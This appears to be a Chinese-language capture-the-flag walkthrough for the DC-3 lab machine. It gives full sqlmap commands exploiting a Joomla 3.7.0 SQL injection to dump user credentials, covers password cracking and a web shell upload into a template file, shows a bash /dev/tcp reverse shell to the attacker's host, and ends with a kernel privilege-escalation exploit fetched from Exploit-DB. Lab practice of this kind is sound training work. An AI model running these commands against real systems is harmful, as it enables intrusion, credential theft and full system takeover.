靶机设置



然后把靶机开起来

信息收集

我们要主要一点在我们,把DC-3设置为仅主机之后就要在kali中设置,把它桥接到kali上,不然就找不到靶机ip了

1
arp-scan -l

找到靶机ip

确定靶机ip为 192.168.56.101,接下来扫描它的端口 看看它都开启了什么服务

1
nmap -p- 192.168.56.101//端口1-65535

成功访问
image.png

1
2
3
4
5
6
7
8
This time, there is only one flag, one entry point and no clues.
To get the flag, you'll obviously have to gain root privileges.
How you get to be root is up to you - and, obviously, the system.
Good luck - and I hope you enjoy this little challenge.
这次,只有一个标志(flag),一个入口点,没有任何线索。
要获取标志,显然你必须获取 root 权限。
如何成为 root 取决于你 - 当然也取决于系统。
祝你好运 - 希望你享受这个小挑战。

我们先扫一波子目录
image.png
我们在这里就发现了一个**administrator/index.php **那我们就去访问看看
image.png
试试弱密码 爆破一波,发现没什么用
image.png
CMS工具的安装跟使用
CMS为Joomla 我们利用工具看看它的版本是多少,看看对应的版本是否存在已知漏洞
image.png那我们知道版本为3.7.0之后就看看,是否有漏洞
运气不错,有sql注入漏洞,而且我们还找到了后台登陆界面
image.png

这里我们选择第一个

1
locate 

image.png
image.png
这里我们就用sqlmap跑出来

1
2
sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

1
2
sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -tables -p list[fullordering]

1
2
sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]

1
2
sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C username,password --dump  -p list[fullordering]

最后得到账号跟密码,但是这个加密之后的数据,我们需要对它进行解密
image.png
找个碰撞工具解开它
image.png
image.png
把我们刚刚得到的密码保存在一个文件中,然后在使用john工具可以解开它
image.png
登入成功
image.png

在这个后台中,我们可以找到一个文件上传的地方,那我们就可以上传一个木马,拿到普通shell了
image.png
image.png

image.png
把马写进去,注意此时路径是 templates/beez3/1.php

image.png

image.png

反弹shell 固权

先将kali监听4444端口

1
nc -nvlp 4444

然后在蚁剑中把shell弹给kali

1
bash -c 'exec bash -i &>/dev/tcp/192.168.56.102/4444 <&1'

反弹成功
image.png
接着就是调用python

1
python -c 'import pty; pty.spawn("/bin/bash")'  

然后

1
2
ctrl +z 
stty raw -echo;fg;reset


得到了一个相对稳定的shell

提权

这个题目为内核提权
查看内核版本

1
uname -a

结果:

Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/L

image.png
拿到版本信息就继续看看版本漏洞
image.png
这里经过测试就只有39772.txt可以成功
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
下载后解压,将exploit.tar通过蚁剑上传至html目录下
上传之后,解压
image.png

1
tar -xvf exploit.tar

image.png
执行 ./compile.sh,会多出几个文件doubleput
image.png
接着执行doubleput文件,等待执行完成就拿到root权限了
image.png
然后就去root目录下找到flag
image.png

完成,收工!!!Congratulations are in order. :-)
I hope you’ve enjoyed this challenge as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!
祝贺你!
我希望你喜欢这个挑战,就像我享受制作它一样。
如果你有任何改进这些小挑战的建议,请告诉我。
如有意见或投诉,可以通过Twitter @DCAU7 发送。
祝你度过愉快的一天!!!